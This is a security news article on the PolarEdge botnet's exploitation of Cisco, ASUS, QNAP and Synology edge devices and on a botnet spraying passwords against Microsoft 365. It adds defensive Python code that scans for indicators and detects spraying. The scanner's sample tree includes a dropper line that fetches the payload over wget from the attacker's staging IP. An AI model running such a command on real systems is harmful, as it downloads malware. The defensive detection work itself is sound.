Polaredge Botnet exploits Cisco and other flaws to hijack ASUS, QNAP, Synology Devices

February 27, 2025Ravi LakshmananVulnerability/Network Security

A new malware campaign has been observed targeting edge devices from Cisco, ASUS, QNAP and Synology and roping them into a botnet named PolarEdge, active since at least the end of 2023.

French cybersecurity company Sekoia said it observed unknown threat actors leveraging CVE-2023-20118 (CVSS score: 6.5), a security flaw in the web-based management interface of Cisco Small Business RV016, RV042, RV042G, RV082, RV320 and RV325 routers that can lead to arbitrary command execution on the device.

The vulnerability remains unpatched because the affected routers have reached end-of-life (EOL) status. As a mitigation, Cisco recommended in early 2023 disabling remote management and blocking access to ports 443 and 60443.

In an attack registered against Sekoia's honeypot, the vulnerability was used to deliver a previously undocumented implant: a TLS backdoor that listens for incoming client connections and executes commands.


The backdoor is deployed by a shell script named "q" that is retrieved via FTP and executed after successful exploitation of the vulnerability. The script:

  • cleans up log files and terminates suspicious processes;
  • downloads a malicious payload named "t.tar" from 119.8.186[.]227;
  • establishes persistence by modifying a file named "/etc/flash/etc/cipher.sh" so that it runs a binary named "cipher_log" extracted from the archive.

Codenamed PolarEdge, the malware enters an infinite loop, establishes a TLS session, spawns a child process to handle client requests, and executes commands via exec_command.

“The binary notifies the C2 server that it has successfully infected a new device,” said Jeremy Scion and Felix Aimé, researchers at Sekoia. “The malware sends this information to the reporting server, allowing attackers to determine which devices have been infected via IP address/port pairing.”

Further analysis revealed similar PolarEdge payloads used to target ASUS, QNAP and Synology devices. All artifacts were uploaded to VirusTotal by users in Taiwan. The payloads are distributed over FTP from the IP address 119.8.186[.]227, which belongs to Huawei Cloud.
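The persistence mechanism and staging indicators above (cipher.sh, cipher_log, t.tar, the FTP staging IP) lend themselves to an offline filesystem check. The following is an added example and is not Sekoia's or Cisco's code; it assumes you have an extracted copy of a device filesystem (a backup or a mounted image) and that the indicators are exactly the strings quoted in the article. The sample tree built by build_sample_root() is constructed for illustration only.

```python
"""Offline IOC check for the PolarEdge persistence described in the article.

Added example (not from Sekoia or Cisco). Assumes an extracted filesystem
root; indicator strings are the ones quoted in the article.
"""
import os
import tempfile
from pathlib import Path

# Indicators quoted in the article
PERSISTENCE_SCRIPT = "etc/flash/etc/cipher.sh"   # modified to launch the implant
DROPPED_BINARY = "cipher_log"                     # extracted from t.tar
PAYLOAD_ARCHIVE = "t.tar"                         # fetched over FTP
STAGING_IP = b"119.8.186.227"                     # article defangs it as 119.8.186[.]227
MAX_SCAN_BYTES = 64 * 1024                        # only grep small files for the IP


def scan_root(root: str) -> list[str]:
    """Return sorted, human-readable findings for one extracted filesystem root."""
    root_path = Path(root)
    findings: list[str] = []

    # 1. The persistence hook: cipher.sh should not reference cipher_log.
    script = root_path / PERSISTENCE_SCRIPT
    if script.is_file() and DROPPED_BINARY in script.read_text(errors="replace"):
        findings.append(f"{PERSISTENCE_SCRIPT} references {DROPPED_BINARY}")

    # 2. Walk the tree once for the dropped binary, the archive, and any small
    #    file (scripts, configs) that embeds the FTP staging address.
    for dirpath, _dirs, files in os.walk(root_path):
        for name in files:
            p = Path(dirpath) / name
            rel = p.relative_to(root_path).as_posix()
            if name == DROPPED_BINARY:
                findings.append(f"dropped binary present: {rel}")
            elif name == PAYLOAD_ARCHIVE:
                findings.append(f"payload archive present: {rel}")
            if p.stat().st_size <= MAX_SCAN_BYTES and STAGING_IP in p.read_bytes():
                findings.append(f"file references staging IP: {rel}")
    return sorted(findings)


def build_sample_root() -> str:
    """Constructed sample tree mimicking an infected device (illustration only)."""
    root = tempfile.mkdtemp(prefix="rv_")
    etc = Path(root) / "etc" / "flash" / "etc"
    etc.mkdir(parents=True)
    (etc / "cipher.sh").write_text("#!/bin/sh\n/tmp/cipher_log &\n")
    tmp = Path(root) / "tmp"
    tmp.mkdir()
    (tmp / "cipher_log").write_bytes(b"\x7fELF" + b"\0" * 16)   # fake binary
    (tmp / "t.tar").write_bytes(b"constructed archive")
    (tmp / "q").write_text("#!/bin/sh\nwget ftp://119.8.186.227/t.tar\n")
    (Path(root) / "etc" / "hostname").write_text("rv042\n")     # benign file
    return root


if __name__ == "__main__":
    for line in scan_root(build_sample_root()):
        print(line)
```

A clean device produces an empty list; the constructed tree yields four findings (the cipher.sh hook, the binary, the archive, and the dropper script that embeds the staging address). On a live router with no shell access, the same checks apply to a configuration or flash backup exported through the management interface.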

Overall, the botnet is estimated to have compromised 2,017 unique IP addresses worldwide, with most infections detected in the US, Taiwan, Russia, India, Brazil, Australia and Argentina.

"The purpose of this botnet has not been determined yet," the researchers pointed out. "The purpose of PolarEdge is to control compromised edge devices and convert them into operational relay boxes to launch offensive cyberattacks."

"The botnet highlights its ability to exploit multiple vulnerabilities across different types of equipment and target different systems. The complexity of the payloads further underscores the sophistication of the operation, suggesting that it is being run by skilled operators."

The disclosure comes as SecurityScorecard revealed that a large botnet of over 130,000 infected devices has been weaponized to carry out massive password spraying attacks against Microsoft 365 (M365) accounts using non-interactive sign-ins with Basic Authentication.


Non-interactive sign-ins are typically used for service-to-service authentication and legacy protocols such as POP, IMAP and SMTP, and in many configurations they do not trigger multi-factor authentication (MFA). Basic Authentication, meanwhile, sends credentials in plaintext (merely Base64-encoded, not encrypted).

The use of infrastructure tied to CDS Global Cloud and UCloud HK suggests the activity is the work of a China-affiliated group, which uses credentials stolen from infostealer logs to gain unauthorized access to a wide range of M365 accounts and retrieve sensitive data.

“This approach bypasses modern login protection, avoids enforcement of MFA, and creates critical blind spots for security teams,” the company said. “Attackers leverage stolen credentials from Infostealer logs to systematically target large accounts.”

"These attacks are recorded in non-interactive sign-in logs, which are often overlooked by security teams. Attackers exploit this gap to conduct high-volume password spraying attempts."
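The blind spot described above is concrete: the failed attempts land in the non-interactive sign-in log, one per account, from a small number of source IPs, and a spray only becomes visible when those records are grouped by source address. The following detection is an added example, not SecurityScorecard's or Microsoft's code. It assumes a newline-delimited JSON export with field names in the shape of Entra ID sign-in logs (createdDateTime, userPrincipalName, ipAddress, clientAppUsed, isInteractive, status.errorCode); the 30-minute window and five-user threshold are assumptions to tune, and the log lines are constructed for illustration.

```python
"""Password-spray detection over non-interactive sign-in records.

Added example (not SecurityScorecard's or Microsoft's code). Field names
follow Entra ID sign-in log exports; thresholds are assumptions.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Legacy protocols that ride on Basic Authentication and appear as non-interactive sign-ins
LEGACY_CLIENTS = {"IMAP4", "POP3", "Authenticated SMTP", "Exchange ActiveSync"}
ERR_BAD_PASSWORD = 50126   # Entra ID: invalid username or password

# Constructed sample log (NDJSON). 203.0.113.10 sprays six accounts over IMAP4
# and lands one success; 198.51.100.7 is one user failing repeatedly (not a
# spray); 192.0.2.44 is a normal interactive browser sign-in.
SAMPLE_LOG = """\
{"createdDateTime":"2025-02-20T03:00:01Z","userPrincipalName":"a.ng@example.com","ipAddress":"203.0.113.10","clientAppUsed":"IMAP4","isInteractive":false,"status":{"errorCode":50126}}
{"createdDateTime":"2025-02-20T03:00:07Z","userPrincipalName":"b.ortiz@example.com","ipAddress":"203.0.113.10","clientAppUsed":"IMAP4","isInteractive":false,"status":{"errorCode":50126}}
{"createdDateTime":"2025-02-20T03:00:15Z","userPrincipalName":"c.ivanova@example.com","ipAddress":"203.0.113.10","clientAppUsed":"IMAP4","isInteractive":false,"status":{"errorCode":50126}}
{"createdDateTime":"2025-02-20T03:00:29Z","userPrincipalName":"d.silva@example.com","ipAddress":"203.0.113.10","clientAppUsed":"IMAP4","isInteractive":false,"status":{"errorCode":50126}}
{"createdDateTime":"2025-02-20T03:00:40Z","userPrincipalName":"e.kumar@example.com","ipAddress":"203.0.113.10","clientAppUsed":"IMAP4","isInteractive":false,"status":{"errorCode":50126}}
{"createdDateTime":"2025-02-20T03:01:02Z","userPrincipalName":"f.wright@example.com","ipAddress":"203.0.113.10","clientAppUsed":"IMAP4","isInteractive":false,"status":{"errorCode":50126}}
{"createdDateTime":"2025-02-20T03:01:30Z","userPrincipalName":"g.tan@example.com","ipAddress":"203.0.113.10","clientAppUsed":"IMAP4","isInteractive":false,"status":{"errorCode":0}}
{"createdDateTime":"2025-02-20T03:05:00Z","userPrincipalName":"h.muller@example.com","ipAddress":"198.51.100.7","clientAppUsed":"POP3","isInteractive":false,"status":{"errorCode":50126}}
{"createdDateTime":"2025-02-20T03:05:20Z","userPrincipalName":"h.muller@example.com","ipAddress":"198.51.100.7","clientAppUsed":"POP3","isInteractive":false,"status":{"errorCode":50126}}
{"createdDateTime":"2025-02-20T03:05:41Z","userPrincipalName":"h.muller@example.com","ipAddress":"198.51.100.7","clientAppUsed":"POP3","isInteractive":false,"status":{"errorCode":50126}}
{"createdDateTime":"2025-02-20T03:06:00Z","userPrincipalName":"i.rossi@example.com","ipAddress":"192.0.2.44","clientAppUsed":"Browser","isInteractive":true,"status":{"errorCode":0}}
"""


def parse_signins(text: str) -> list[dict]:
    """Parse NDJSON sign-in records."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _ts(rec: dict) -> datetime:
    return datetime.strptime(rec["createdDateTime"], "%Y-%m-%dT%H:%M:%SZ")


def detect_spray(records: list[dict], window: timedelta = timedelta(minutes=30),
                 min_users: int = 5) -> dict[str, dict]:
    """Flag source IPs that fail legacy-auth logins for >= min_users distinct
    accounts inside any `window`, and list accounts the same IP then got into."""
    attempts: dict[str, list[tuple[datetime, str]]] = defaultdict(list)
    successes: dict[str, set[str]] = defaultdict(set)
    for rec in records:
        # Only the non-interactive, legacy-protocol path the article describes
        if rec.get("isInteractive", True) or rec.get("clientAppUsed") not in LEGACY_CLIENTS:
            continue
        ip, user = rec["ipAddress"], rec["userPrincipalName"].lower()
        code = rec["status"]["errorCode"]
        if code == ERR_BAD_PASSWORD:
            attempts[ip].append((_ts(rec), user))
        elif code == 0:
            successes[ip].add(user)

    alerts: dict[str, dict] = {}
    for ip, events in attempts.items():
        events.sort()
        # Sliding window over sorted failures: max distinct users seen in any window
        best = 0
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            best = max(best, len(users))
        if best >= min_users:
            alerts[ip] = {"distinct_users": best,
                          "successes": sorted(successes.get(ip, ()))}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_spray(parse_signins(SAMPLE_LOG)).items():
        print(f"{ip}: {info['distinct_users']} accounts sprayed; compromised: {info['successes']}")
```

Grouping by source IP and counting distinct accounts is what separates a spray from a single-account brute force (198.51.100.7 above is noisy but not a spray). Any successful legacy-auth sign-in from a flagged IP is the account to reset first, and the durable fix is the one the article implies: disable Basic Authentication so these protocols cannot be used at all.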
